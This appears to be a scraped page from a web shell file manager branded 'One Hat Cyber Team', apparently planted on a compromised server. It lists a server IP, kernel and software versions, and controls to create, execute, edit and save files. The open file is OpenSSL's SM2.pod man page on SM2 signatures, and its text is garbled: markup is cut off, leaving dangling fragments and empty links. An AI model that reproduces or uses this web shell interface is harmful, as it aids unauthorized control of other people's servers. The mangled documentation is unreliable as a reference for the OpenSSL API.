⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
server
/
nginx
/
src
/
openssl
/
doc
/
man7
/
Edit File: SM2.pod
=pod =head1 NAME SM2 - Chinese SM2 signature and encryption algorithm support =head1 DESCRIPTION The B
algorithm was first defined by the Chinese national standard GM/T 0003-2012 and was later standardized by ISO as ISO/IEC 14888. B
is actually an elliptic curve based algorithm. The current implementation in OpenSSL supports both signature and encryption schemes via the EVP interface. When doing the B
signature algorithm, it requires a distinguishing identifier to form the message prefix which is hashed before the real message is hashed. =head1 NOTES B
signatures can be generated by using the 'DigestSign' series of APIs, for instance, EVP_DigestSignInit(), EVP_DigestSignUpdate() and EVP_DigestSignFinal(). Ditto for the verification process by calling the 'DigestVerify' series of APIs. There are several special steps that need to be done before computing an B
signature. The B
structure will default to using ECDSA for signatures when it is created. It should be set to B
by calling: EVP_PKEY_set_alias_type(pkey, EVP_PKEY_SM2); Then an ID should be set by calling: EVP_PKEY_CTX_set1_id(pctx, id, id_len); When calling the EVP_DigestSignInit() or EVP_DigestVerifyInit() functions, a preallocated B
should be assigned to the B
. This is done by calling: EVP_MD_CTX_set_pkey_ctx(mctx, pctx); And normally there is no need to pass a B
parameter to EVP_DigestSignInit() or EVP_DigestVerifyInit() in such a scenario. =head1 EXAMPLES This example demonstrates the calling sequence for using an B
to verify a message with the SM2 signature algorithm and the SM3 hash algorithm: #include
/* obtain an EVP_PKEY using whatever methods... */ EVP_PKEY_set_alias_type(pkey, EVP_PKEY_SM2); mctx = EVP_MD_CTX_new(); pctx = EVP_PKEY_CTX_new(pkey, NULL); EVP_PKEY_CTX_set1_id(pctx, id, id_len); EVP_MD_CTX_set_pkey_ctx(mctx, pctx);; EVP_DigestVerifyInit(mctx, NULL, EVP_sm3(), NULL, pkey); EVP_DigestVerifyUpdate(mctx, msg, msg_len); EVP_DigestVerifyFinal(mctx, sig, sig_len) =head1 SEE ALSO L
, L
, L
, L
, L
, L
=head1 COPYRIGHT Copyright 2018-2020 The OpenSSL Project Authors. All Rights Reserved. Licensed under the OpenSSL license (the "License"). You may not use this file except in compliance with the License. You can obtain a copy in the file LICENSE in the source distribution or at L
. =cut
Simpan